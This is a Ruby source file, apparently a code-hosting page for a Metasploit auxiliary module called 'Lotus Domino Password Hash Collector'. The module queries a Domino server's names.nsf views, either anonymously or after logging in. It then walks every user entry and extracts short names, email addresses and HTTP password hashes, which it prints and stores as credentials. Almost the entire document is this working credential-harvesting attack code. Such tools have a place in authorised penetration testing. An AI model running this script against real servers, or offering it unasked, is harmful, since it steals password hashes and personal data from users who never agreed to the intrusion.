195 lines
5.6 KiB
Ruby
195 lines
5.6 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Lotus Domino Password Hash Collector',
|
|
'Version' => '$Revision$',
|
|
'Description' => 'Get users passwords hashs from names.nsf page',
|
|
'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',
|
|
'License' => MSF_LICENSE
|
|
)
|
|
|
|
register_options(
|
|
[ Opt::RPORT(80),
|
|
OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']),
|
|
OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]),
|
|
OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf']),
|
|
], self.class)
|
|
|
|
end
|
|
|
|
def run_host(ip)
|
|
|
|
user = datastore['NOTES_USER'].to_s
|
|
pass = datastore['NOTES_PASS'].to_s
|
|
$uri = datastore['URI'].to_s
|
|
|
|
if (user.length == 0 and pass.length == 0)
|
|
print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs without credentials")
|
|
|
|
begin
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => "#{$uri}\/$defaultview?Readviewentries",
|
|
}, 25)
|
|
|
|
if (res and res.body.to_s =~ /\<viewentries/)
|
|
print_good("http://#{vhost}:#{rport} - Lotus Domino - OK names.nsf accessible without credentials")
|
|
cookie = ''
|
|
get_views(cookie,$uri)
|
|
|
|
elsif (res and res.body.to_s =~ /names.nsf\?Login/)
|
|
print_error("http://#{vhost}:#{rport} - Lotus Domino - The remote server requires authentication")
|
|
return :abort
|
|
|
|
else
|
|
print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
|
|
print_error(res.inspect)
|
|
return :abort
|
|
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
end
|
|
|
|
else
|
|
print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs with given credentials")
|
|
do_login(user, pass)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
def do_login(user=nil,pass=nil)
|
|
post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
|
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => '/names.nsf?Login',
|
|
'data' => post_data,
|
|
}, 20)
|
|
|
|
if (res and res.code == 302 )
|
|
if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
|
|
cookie = "DomAuthSessId=#{$1}"
|
|
elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
|
|
cookie = "LtpaToken=#{$1}"
|
|
else
|
|
print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
|
|
return :abort
|
|
end
|
|
print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
|
|
print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashs")
|
|
get_views(cookie,$uri)
|
|
|
|
elsif (res and res.body.to_s =~ /names.nsf\?Login/)
|
|
print_error("http://#{vhost}:#{rport} - Lotus Domino - Authentication error: failed to login as '#{user}'")
|
|
return :abort
|
|
|
|
else
|
|
print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
|
|
return :abort
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
end
|
|
|
|
end
|
|
|
|
def get_views(cookie,uri)
|
|
|
|
begin
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => "#{uri}\/$defaultview?Readviewentries",
|
|
'cookie' => cookie,
|
|
}, 25)
|
|
if (res and res.body)
|
|
max = res.body.scan(/siblings=\"(.*)\"/)[0].join
|
|
|
|
1.upto(max.to_i) {|i|
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => "#{uri}\/$defaultview?Readviewentries&Start=#{i}",
|
|
'cookie' => cookie,
|
|
}, 25)
|
|
|
|
viewId = res.body.scan(/unid="([^\s]+)"/)[0].join
|
|
dump_hashes(viewId,cookie,uri)
|
|
}
|
|
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
end
|
|
end
|
|
|
|
def dump_hashes(view_id,cookie,uri)
|
|
|
|
begin
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => "#{uri}\/$defaultview/#{view_id}?OpenDocument",
|
|
'cookie' => cookie,
|
|
}, 25)
|
|
|
|
if (res and res.body)
|
|
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
|
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
|
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
|
|
|
if short_name.to_s.strip.empty?
|
|
short_name = 'NULL'
|
|
end
|
|
|
|
if user_mail.to_s.strip.empty?
|
|
user_mail = 'NULL'
|
|
end
|
|
|
|
if pass_hash.to_s.strip.empty?
|
|
pass_hash = 'NULL'
|
|
end
|
|
|
|
print_good("http://#{vhost}:#{rport} - Lotus Domino - Account Found: #{short_name}, #{user_mail}, #{pass_hash}")
|
|
|
|
if pass_hash != 'NULL'
|
|
report_auth_info(
|
|
:host => rhost,
|
|
:port => rport,
|
|
:sname => 'http',
|
|
:user => short_name,
|
|
:proof => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}",
|
|
:active => true
|
|
)
|
|
end
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
end
|
|
end
|
|
end
|